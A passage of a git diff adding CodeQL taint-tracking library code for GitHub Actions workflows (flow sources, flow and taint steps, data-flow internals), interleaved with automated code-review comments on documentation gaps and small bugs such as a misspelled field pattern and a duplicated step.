+ */ +class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { + TJActionsVerifyChangedFilesSource() { + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and + u.getCallee() = "tj-actions/verify-changed-files" and + u.getCallee() = vulnerable_action and + ( + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +class Xt0rtedSlashCommandSource extends RemoteFlowSource { + Xt0rtedSlashCommandSource() { + exists(UsesStep u | + u.getCallee() = "xt0rted/slash-command-action" and + u.getArgument("permission-level").toLowerCase() = ["read", "none"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { + ZenteredIssueFormBodyParserSource() { + exists(UsesStep u | + u.getCallee() = "zentered/issue-forms-body-parser" and + not exists(u.getArgument("body")) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +class OctokitRequestActionSource extends RemoteFlowSource { + OctokitRequestActionSource() { + exists(UsesStep u, string route | + u.getCallee() = "octokit/request-action" and + route = u.getArgument("route").trim() and + route.indexOf("GET") = 0 and + ( + route.matches("%/commits%") or + route.matches("%/comments%") or + route.matches("%/pulls%") or + route.matches("%/issues%") or + route.matches("%/users%") or + 
route.matches("%github.event.issue.pull_request.url%") + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} diff --git a/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll new file mode 100644 index 000000000000..0f7e906685b1 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
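Review bot: Most public classes in this file have no QLDoc — `GitHubEventCtxSource`, `CommandSource`, `GitCommandSource`, `GhCLICommandSource`, `GitHubEventPathSource`, `GitHubEventJsonSource`, `Xt0rtedSlashCommandSource`, `ZenteredIssueFormBodyParserSource` and `OctokitRequestActionSource` — which is presumably why the workflow hunk in this commit exempts `actions` from the QLDoc coverage check; each needs a one-line doc in the style of the existing `/** A downloaded artifact. */`, e.g. `/** A `gh` CLI command whose output is derived from pull request or issue data. */` for `GhCLICommandSource`, with the wording adjusted to what each class actually matches. In `GitHubEventPathSource` the access path comes from `cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1)`, which captures the last whitespace-delimited token before the final one; that is the jq filter for the commented examples, but for `jq -r '.issue.body' "$GITHUB_EVENT_PATH"` the token keeps its quotes and for `jq .x < "$GITHUB_EVENT_PATH"` it is `<`, so either confirm `normalizeExpr` copes with these or anchor the capture on the filter's leading `.`. The nine identical `override string getEventName() { result = this.asExpr().getATriggerEvent().getName() }` bodies could become the default implementation on `RemoteFlowSource`, leaving only `GitHubCtxSource`, `GitHubEventCtxSource`, `CommandSource` and `GitHubEventJsonSource` to override it.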
@@ -0,0 +1,92 @@
+/**
+ * Provides classes representing various flow steps for taint tracking.
+ */
+
+private import actions
+private import codeql.actions.DataFlow
+private import codeql.actions.dataflow.FlowSources
+
+/**
+ * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script.
+ * e.g.
+ * - name: Extract and Clean Initial URL
+ * id: extract-url
+ * env:
+ * BODY: ${{ github.event.comment.body }}
+ * run: |
+ * echo "::set-output name=foo::$BODY"
+ * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT
+ * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT"
+ * echo "::set-output name=step-output::$BODY"
+ */
+predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) {
+ exists(Run run, string var, string field |
+ run.getInScopeEnvVarExpr(var) = pred.asExpr() and
+ succ.asExpr() = run and
+ run.getScript().getAnEnvReachingGitHubOutputWrite(var, field) and
+ c = any(DataFlow::FieldContent ct | ct.getName() = field)
+ )
+}
+
+predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) {
+ exists(
+ Run run, string var, string field //string key, string value |
+ |
+ run.getInScopeEnvVarExpr(var) = pred.asExpr() and
+ // we store the taint on the enclosing job since the may not exist an implicit env attribute
+ succ.asExpr() = run.getEnclosingJob() and
+ run.getScript().getAnEnvReachingGitHubEnvWrite(var, field) and
+ c = any(DataFlow::FieldContent ct | ct.getName() = field)
+ )
+}
+
+/**
+ * A command whose output gets assigned to an environment variable or step output.
+ * - run: |
+ * echo "foo=$(cmd)" >> "$GITHUB_OUTPUT"
+ * - run: |
+ * foo=$(> "$GITHUB_OUTPUT"
+ */
+predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) {
+ exists(Run run, string key, string cmd |
+ (
+ exists(CommandSource source | source.getCommand() = cmd)
+ or
+ exists(FileSource source |
+ source.asExpr().(Step).getAFollowingStep() = run and
+ run.getScript().getAFileReadCommand() = cmd
+ )
+ ) and
+ run.getScript().getACmdReachingGitHubOutputWrite(cmd, key) and
+ c = any(DataFlow::FieldContent ct | ct.getName() = key) and
+ pred.asExpr() = run.getScript() and
+ succ.asExpr() = run
+ )
+}
+
+/**
+ * A command whose output gets assigned to an environment variable or step output.
+ * - run: |
+ * echo "foo=$(cmd)" >> "$GITHUB_ENV"
+ * - run: |
+ * foo=$(> "$GITHUB_ENV"
+ */
+predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) {
+ exists(Run run, string key, string cmd |
+ (
+ exists(CommandSource source | source.getCommand() = cmd)
+ or
+ exists(FileSource source |
+ source.asExpr().(Step).getAFollowingStep() = run and
+ run.getScript().getAFileReadCommand() = cmd
+ )
+ ) and
+ run.getScript().getACmdReachingGitHubEnvWrite(cmd, key) and
+ c = any(DataFlow::FieldContent ct | ct.getName() = key) and
+ pred.asExpr() = run.getScript() and
+ // we store the taint on the enclosing job since there may not be an implicit env attribute
+ succ.asExpr() = run.getEnclosingJob()
+ )
+}
diff --git a/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll
new file mode 100644
index 000000000000..56e2c75123c0
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll
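Review bot: In `commandToOutputStoreStep` and `commandToEnvStoreStep`, `exists(CommandSource source | source.getCommand() = cmd)` ties the source to `run` only through the command's text, so a `git`/`gh`/`jq` command in one workflow qualifies the identical string in any other `Run` step in the database; the `FileSource` branch beside it does anchor on `run`, and the command branch should too, e.g. `exists(CommandSource source | source.getCommand() = cmd and source.getEnclosingRun() = run)`. `envToEnvStoreStep` still carries the dead `//string key, string value |` fragment in its `exists` header, is the only predicate in the file without QLDoc, and its comment reads `since the may not exist an implicit env attribute` where the later copy in `commandToEnvStoreStep` says `since there may not be an implicit env attribute`; one wording in both places would do. The `foo=$(> "$GITHUB_OUTPUT"` example in the two QLDoc blocks looks truncated (presumably a file-read command was lost) and should be restored so the documented shape matches what `getAFileReadCommand` recognises.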
@@ -0,0 +1,156 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +private import actions +private import codeql.util.Unit +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to all + * taint configurations. + */ +class AdditionalTaintStep extends Unit { + /** + * Holds if the step from `node1` to `node2` should be considered a taint + * step for all configurations. + */ + abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); +} + +/** + * A file source step followed by a Run step may read the file. + */ +predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(FileSource source, Run run | + pred = source and + source.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) +} + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/changed-files action. 
+ */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. + */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsVerifyChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the zentered/issue-forms-body-parser action. 
+ */ +predicate zenteredIssueFormBodyParserSource(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof ZenteredIssueFormBodyParserSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") + ) and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the octokit/request-action action. + */ +predicate octokitRequestActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof OctokitRequestActionSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + succ.asExpr() = o and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") and + o.(JsonReferenceExpression) + .getAccessPath() + .matches([ + "%.title", + "%.user.login", + "%.body", + "%.head.ref", + "%.head.repo.full_name", + "%.commit.author.email", + "%.commit.commiter.email", + "%.commit.message", + "%.email", + "%.name", + ]) + ) + ) +} + +class TaintSteps extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) or + zenteredIssueFormBodyParserSource(node1, node2) or + octokitRequestActionTaintStep(node1, node2) + } +} 
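Review bot: In `octokitRequestActionTaintStep` the access-path pattern `"%.commit.commiter.email"` misspells the GitHub API field, which is `commit.committer.email`, so reads of the committer e-mail through this action are never treated as tainted; it should be `"%.commit.committer.email"`. In `TaintSteps.step`, `xt0rtedSlashCommandActionTaintStep(node1, node2)` is listed twice, and `zenteredIssueFormBodyParserSource` is a taint step despite its `...Source` name, so renaming it `zenteredIssueFormBodyParserTaintStep` would match its siblings. `dornyPathsFilterTaintStep` is also the only step here that does not require `o.getTarget() = pred.asExpr()`, so it appears to link by step id alone and may relate a `_files` read to an unrelated step reusing the same id (inferred from the predicate bodies; confirm against `StepsExpression.getTarget`). `fileDownloadToRunStep` is defined but not included in `step`; if that is deliberate, a one-line comment naming where it is consumed would save the next reader the search.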
diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll new file mode 100644 index 000000000000..2e3c13f164c2 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -0,0 +1,15 @@ +/** + * Provides Actions-specific definitions for use in the data flow library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/DataFlow.qll + */ + +private import codeql.dataflow.DataFlow +private import codeql.Locations + +module ActionsDataFlow implements InputSig { + import DataFlowPrivate as Private + import DataFlowPublic + import Private + + predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1; +} diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll new file mode 100644 index 000000000000..cf95292588c3 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -0,0 +1,403 @@ +private import codeql.util.Unit +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import codeql.actions.controlflow.BasicBlocks +private import DataFlowPublic +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.dataflow.FlowSources + +class DataFlowSecondLevelScope = Unit; + +cached +newtype TNode = TExprNode(DataFlowExpr e) + +class OutNode extends ExprNode { + private DataFlowCall call; + + OutNode() { call = this.getCfgNode() } + + DataFlowCall getCall(ReturnKind kind) { + result = call and + kind instanceof NormalReturn + } +} + +/** + * Not implemented + */ +class CastNode extends Node { + CastNode() { none() } +} + +/** + * Not implemented + */ +class PostUpdateNode extends Node { + PostUpdateNode() { none() } + + Node getPreUpdateNode() { none() } +} + +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { + p.isParameterOf(c, pos) +} + +predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { + arg.argumentOf(call, pos) +} + +DataFlowCallable nodeGetEnclosingCallable(Node node) { + node = TExprNode(any(DataFlowExpr e | result = e.getScope())) +} + +DataFlowType getNodeType(Node node) { any() } + +predicate nodeIsHidden(Node node) { none() } + +class DataFlowExpr extends Cfg::Node { + DataFlowExpr() { + this.getAstNode() instanceof Job or + this.getAstNode() instanceof Expression or + this.getAstNode() instanceof Uses or + this.getAstNode() instanceof Run or + this.getAstNode() instanceof Outputs or + this.getAstNode() instanceof Input or + this.getAstNode() instanceof ScalarValue + } +} + +/** + * A call corresponds to a Uses steps where a composite action or a reusable workflow get called + */ +class DataFlowCall instanceof Cfg::Node { + DataFlowCall() { super.getAstNode() instanceof 
Uses } + + /** Gets a textual representation of this element. */ + string toString() { result = super.toString() } + + string getName() { result = super.getAstNode().(Uses).getCallee() } + + DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } + + /** Gets the location of this call. */ + Location getLocation() { result = this.(Cfg::Node).getLocation() } +} + +/** + * A Cfg scope that can be called + */ +class DataFlowCallable instanceof Cfg::CfgScope { + string toString() { result = super.toString() } + + string getName() { + result = this.(ReusableWorkflowImpl).getResolvedPath() or + result = this.(CompositeActionImpl).getResolvedPath() + } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } + + /** Gets the location of this callable. */ + Location getLocation() { result = this.(Cfg::CfgScope).getLocation() } +} + +newtype TReturnKind = TNormalReturn() + +abstract class ReturnKind extends TReturnKind { + /** Gets a textual representation of this element. */ + abstract string toString(); +} + +class NormalReturn extends ReturnKind, TNormalReturn { + override string toString() { result = "return" } +} + +/** Gets a viable implementation of the target of the given `Call`. */ +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } + +/** + * Gets a node that can read the value returned from `call` with return kind + * `kind`. + */ +OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) { call = result.getCall(kind) } + +private newtype TDataFlowType = TUnknownDataFlowType() + +/** + * A type for a data flow node. + * + * This may or may not coincide with any type system existing for the source + * language, but should minimally include unique types for individual closure + * expressions (typically lambdas). 
+ */ +class DataFlowType extends TDataFlowType { + string toString() { result = "" } +} + +string ppReprType(DataFlowType t) { none() } + +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { any() } + +predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } + +newtype TContent = + TFieldContent(string name) { + // We only use field flow for env, steps and jobs outputs + // not for accessing other context fields such as matrix or inputs + name = any(StepsExpression a).getFieldName() or + name = any(NeedsExpression a).getFieldName() or + name = any(JobsExpression a).getFieldName() or + name = any(EnvExpression a).getFieldName() + } + +predicate forceHighPrecision(Content c) { c instanceof FieldContent } + +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + +class ContentApprox = ContentSet; + +ContentApprox getContentApprox(Content c) { result = c } + +/** + * Made a string to match the ArgumentPosition type. + */ +class ParameterPosition extends string { + ParameterPosition() { + exists(any(ReusableWorkflow w).getInput(this)) or + exists(any(CompositeAction a).getInput(this)) + } +} + +/** + * Made a string to match `With:` keys in the AST + */ +class ArgumentPosition extends string { + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } +} + +/** + */ +predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } + +/** + * Holds if there is a local flow step between a ${{ steps.xxx.outputs.yyy }} expression accesing a step output field + * and the step output itself. But only for those cases where the step output is defined externally in a MaD Source + * specification. 
The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Uses astFrom, StepsExpression astTo | + madSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{ needs.xxx.outputs.yyy }} expression accesing a job output field + * and the step output itself. But only for those cases where the job (needs) output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Uses astFrom, NeedsExpression astTo | + madSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself + * e.g. 
${{ inputs.foo }} + */ +predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(AstNode astFrom, InputsExpression astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing a matrix variable and the matrix itself + * e.g. ${{ matrix.foo }} + */ +predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(AstNode astFrom, MatrixExpression astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getTarget() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself + * e.g. ${{ env.foo }} + */ +predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(AstNode astFrom, EnvExpression astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + ( + madSource(nodeFrom, _, "env." + astTo.getFieldName()) + or + astTo.getTarget() = astFrom + ) + ) +} + +/** + * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. + * For Actions, we dont need SSA nodes since it should be already in SSA form + * Local flow steps are always between two nodes in the same Cfg scope. + */ +pragma[nomagic] +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepsCtxLocalStep(nodeFrom, nodeTo) or + needsCtxLocalStep(nodeFrom, nodeTo) or + inputsCtxLocalStep(nodeFrom, nodeTo) or + matrixCtxLocalStep(nodeFrom, nodeTo) or + envCtxLocalStep(nodeFrom, nodeTo) +} + +/** + * This is the local flow predicate that is used as a building block in global + * data flow. + */ +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} + +/** + * Holds if data can flow from `node1` to `node2` through a non-local step + * that does not follow a call edge. For example, a step through a global + * variable. 
+ * We throw away the call context and let us jump to any location + * AKA teleport steps + * local steps are preferible since they are more predictable and easier to control + */ +predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } + +/** + * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + */ +predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { + exists(SimpleReferenceExpression access | + ( + access instanceof NeedsExpression or + access instanceof StepsExpression or + access instanceof JobsExpression or + access instanceof EnvExpression + ) and + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getTarget() and + node2.asExpr() = access + ) +} + +/** + * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, + * `node1` references an object with a content `c.getAReadContent()` whose + * value ends up in `node2`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. + */ +predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } + +/** + * Stores an output expression (node1) into its OutputsStm node (node2) + * using the output variable name as the access path + */ +predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { + exists(Outputs out, string fieldName | + node1.asExpr() = out.getOutputExpr(fieldName) and + node2.asExpr() = out and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} + +/** + * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, + * `node2` references an object with a content `c.getAStoreContent()` that + * contains the value of `node1`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. 
+ */ +predicate storeStep(Node node1, ContentSet c, Node node2) { + fieldStoreStep(node1, node2, c) or + madStoreStep(node1, node2, c) or + envToOutputStoreStep(node1, node2, c) or + envToEnvStoreStep(node1, node2, c) or + commandToOutputStoreStep(node1, node2, c) or + commandToEnvStoreStep(node1, node2, c) +} + +/** + * Holds if values stored inside content `c` are cleared at node `n`. For example, + * any value stored inside `f` is cleared at the pre-update node associated with `x` + * in `x.f = newValue`. + */ +predicate clearsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the value that is being tracked is expected to be stored inside content `c` + * at node `n`. + */ +predicate expectsContent(Node n, ContentSet c) { none() } + +/** + * Holds if flow is allowed to pass from parameter `p` and back to itself as a + * side-effect, resulting in a summary from `p` to itself. + * + * One example would be to allow flow like `p.foo = p.bar;`, which is disallowed + * by default as a heuristic. + */ +predicate allowParameterReturnInSelf(ParameterNode p) { none() } + +predicate localMustFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +private newtype TLambdaCallKind = TNone() + +class LambdaCallKind = TLambdaCallKind; + +/** Holds if `creation` is an expression that creates a lambda of kind `kind` for `c`. */ +predicate lambdaCreation(Node creation, LambdaCallKind kind, DataFlowCallable c) { none() } + +/** Holds if `call` is a lambda call of kind `kind` where `receiver` is the lambda expression. */ +predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { none() } + +/** Extra data-flow steps needed for lambda flow analysis. */ +predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } + +/** + * Since our model is so simple, we dont want to compress the local flow steps. + * This compression is normally done to not show SSA steps, casts, etc. 
+ */ +predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll new file mode 100644 index 000000000000..9c05256e2fa0 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
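Review bot: `stepsCtxLocalStep` accepts MaD sources modelled as `output.*` through `"output." + ["*", astTo.getFieldName()]`, but `needsCtxLocalStep` only matches `"output." + astTo.getFieldName()`, so a wildcard source model propagates through `steps.<id>.outputs.<field>` yet not through `needs.<job>.outputs.<field>`; if that asymmetry is unintended the second predicate should use the same `["*", astTo.getFieldName()]` form. `parameterMatch` carries an empty QLDoc (`/** */`); `/** Holds if parameter position ppos matches argument position apos: both are the input name, i.e. the with: key, so they match by string equality. */` would document it. Several QLDoc comments repeat `accesing` for `accessing`, and the `jumpStep` comment has `preferible` for `preferable`. The `DataFlowCall` class comment should read `A call corresponds to a Uses step where a composite action or a reusable workflow gets called`.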
@@ -0,0 +1,194 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import DataFlowPrivate + +class Node extends TNode { + /** Gets a textual representation of this element. */ + string toString() { none() } + + Location getLocation() { none() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } + + AstNode asExpr() { none() } +} + +/** + * Any Ast Expression. + * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... + */ +class ExprNode extends Node, TExprNode { + private DataFlowExpr expr; + + ExprNode() { this = TExprNode(expr) } + + Cfg::Node getCfgNode() { result = expr } + + override string toString() { result = expr.toString() } + + override Location getLocation() { result = expr.getLocation() } + + override AstNode asExpr() { result = expr.getAstNode() } +} + +/** + * Reusable workflow input nodes + */ +class ParameterNode extends ExprNode { + private Input input; + + ParameterNode() { this.asExpr() = input } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + input = c.(ReusableWorkflow).getInput(pos) or + input = c.(CompositeAction).getInput(pos) + } + + override string toString() { result = "input " + input.toString() } + + override Location getLocation() { result = input.getLocation() } + + Input getInput() { result = input } +} + +/** + * A call to a data flow callable (Uses). 
+ */ +class CallNode extends ExprNode { + private DataFlowCall call; + + CallNode() { this.getCfgNode() instanceof DataFlowCall } + + DataFlowCallable getCalleeNode() { result = viableCallable(this.getCfgNode()) } +} + +/** + * An argument to a Uses step (call). + */ +class ArgumentNode extends ExprNode { + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } + + predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { + this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and + call.(Cfg::Node).getAstNode() = + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + } +} + +/** + * Reusable workflow output nodes + */ +class ReturnNode extends ExprNode { + private Outputs outputs; + + ReturnNode() { + this.asExpr() = outputs and + ( + exists(ReusableWorkflow w | w.getOutputs() = outputs) or + exists(CompositeAction a | a.getOutputs() = outputs) + ) + } + + ReturnKind getKind() { result = TNormalReturn() } + + override string toString() { result = "output " + outputs.toString() } + + override Location getLocation() { result = outputs.getLocation() } +} + +/** Gets the node corresponding to `e`. */ +Node exprNode(DataFlowExpr e) { result = TExprNode(e) } + +/** + * An entity that represents a set of `Content`s. + * + * The set may be interpreted differently depending on whether it is + * stored into (`getAStoreContent`) or read from (`getAReadContent`). + */ +class ContentSet instanceof Content { + /** Gets a content that may be stored into when storing into this set. */ + Content getAStoreContent() { result = this } + + /** Gets a content that may be read from when reading from this set. */ + Content getAReadContent() { result = this } + + /** Gets a textual representation of this content set. */ + string toString() { result = super.toString() } + + /** + * Holds if this element is at the specified location. 
+ * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + super.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } +} + +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ +class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + + /** Gets a textual representation of this element. */ + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} + +/** A field of an object, for example an instance variable. */ +class FieldContent extends Content, 